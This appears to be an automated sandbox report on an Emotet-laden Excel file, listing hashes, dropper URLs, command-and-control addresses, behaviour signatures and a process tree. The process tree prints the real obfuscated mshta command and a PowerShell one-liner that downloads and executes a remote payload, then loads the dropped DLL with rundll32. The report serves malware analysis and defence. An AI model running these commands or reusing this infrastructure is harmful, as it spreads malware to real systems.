Analysis

  • max time kernel
    132s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:30

General

  • Target

    Form.xls

  • Size

    47KB

  • MD5

    3e649c0b1d927f74c6238b18c6fd8619

  • SHA1

    072273302bd2d575877376020dc1cca46faf2baf

  • SHA256

    72c1af140f4064bf0f206acee07a9200f696dd467ba5ece31e5f854bf04c7466

  • SHA512

    f182349fb4c17125bec1d6f9534a21d758d23e650a87869b78766ea58e69a09379cf630eddfb39e4c815521a15412341156268a232249049c54813a68e7a963b

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Form.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3260
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2152
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2232
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1776
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2672
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1124
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:3896
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gfduqefx\arxptyzkifnl.nlb",nYljsHJaduh
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1824
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gfduqefx\arxptyzkifnl.nlb",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2860
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2232 -s 1964
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2676

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    97daeda7d5269be2a567138e6ed876fe

    SHA1

    ce707e51f782320a38f0bb434277edcc4394abbb

    SHA256

    918b972486087dfd6d7ad348771617d9c9a45a7dc9ed5ce48b525e2ceb70da7f

    SHA512

    1c7a1b4d13e874dc6359d4bbcf8c0d5efd6ec8143daebd8b512c3f3b6fc6da2666feba404ac4c73fae91229ae541856c94a52d7e707acc593af44b89eb8901be

  • \ProgramData\QWER.dll
    MD5

    97daeda7d5269be2a567138e6ed876fe

    SHA1

    ce707e51f782320a38f0bb434277edcc4394abbb

    SHA256

    918b972486087dfd6d7ad348771617d9c9a45a7dc9ed5ce48b525e2ceb70da7f

    SHA512

    1c7a1b4d13e874dc6359d4bbcf8c0d5efd6ec8143daebd8b512c3f3b6fc6da2666feba404ac4c73fae91229ae541856c94a52d7e707acc593af44b89eb8901be

  • \ProgramData\QWER.dll
    MD5

    97daeda7d5269be2a567138e6ed876fe

    SHA1

    ce707e51f782320a38f0bb434277edcc4394abbb

    SHA256

    918b972486087dfd6d7ad348771617d9c9a45a7dc9ed5ce48b525e2ceb70da7f

    SHA512

    1c7a1b4d13e874dc6359d4bbcf8c0d5efd6ec8143daebd8b512c3f3b6fc6da2666feba404ac4c73fae91229ae541856c94a52d7e707acc593af44b89eb8901be

  • memory/1124-322-0x00000000040B0000-0x00000000040D5000-memory.dmp
    Filesize

    148KB

  • memory/1776-310-0x0000015936040000-0x00000159360B6000-memory.dmp
    Filesize

    472KB

  • memory/1776-315-0x000001591BA50000-0x000001591BB48000-memory.dmp
    Filesize

    992KB

  • memory/1776-278-0x000001591D970000-0x000001591D992000-memory.dmp
    Filesize

    136KB

  • memory/1776-294-0x000001591BA50000-0x000001591BB48000-memory.dmp
    Filesize

    992KB

  • memory/1776-295-0x000001591BA50000-0x000001591BB48000-memory.dmp
    Filesize

    992KB

  • memory/1776-299-0x0000015935F80000-0x0000015935FBC000-memory.dmp
    Filesize

    240KB

  • memory/1824-337-0x0000000003650000-0x0000000003675000-memory.dmp
    Filesize

    148KB

  • memory/2860-346-0x00000000055D0000-0x00000000055F5000-memory.dmp
    Filesize

    148KB

  • memory/2860-361-0x0000000005950000-0x0000000005975000-memory.dmp
    Filesize

    148KB

  • memory/2860-348-0x00000000056B0000-0x00000000056D5000-memory.dmp
    Filesize

    148KB

  • memory/2860-344-0x00000000054F0000-0x0000000005515000-memory.dmp
    Filesize

    148KB

  • memory/2860-341-0x00000000034F0000-0x0000000003515000-memory.dmp
    Filesize

    148KB

  • memory/2860-350-0x0000000005790000-0x00000000057B5000-memory.dmp
    Filesize

    148KB

  • memory/2860-352-0x0000000005870000-0x0000000005895000-memory.dmp
    Filesize

    148KB

  • memory/3260-117-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/3260-383-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/3260-382-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/3260-381-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/3260-129-0x00007FFB36410000-0x00007FFB36420000-memory.dmp
    Filesize

    64KB

  • memory/3260-116-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/3260-384-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/3260-118-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/3260-119-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/3260-115-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/3260-128-0x00007FFB36410000-0x00007FFB36420000-memory.dmp
    Filesize

    64KB

  • memory/3896-328-0x0000000004B10000-0x0000000004B35000-memory.dmp
    Filesize

    148KB

  • memory/3896-340-0x0000000004FC0000-0x0000000004FE5000-memory.dmp
    Filesize

    148KB

  • memory/3896-336-0x0000000004E10000-0x0000000004E35000-memory.dmp
    Filesize

    148KB

  • memory/3896-334-0x0000000004DB0000-0x0000000004DD5000-memory.dmp
    Filesize

    148KB

  • memory/3896-332-0x0000000004D50000-0x0000000004D75000-memory.dmp
    Filesize

    148KB

  • memory/3896-330-0x0000000004BF0000-0x0000000004C15000-memory.dmp
    Filesize

    148KB

  • memory/3896-325-0x0000000002CB0000-0x0000000002CD5000-memory.dmp
    Filesize

    148KB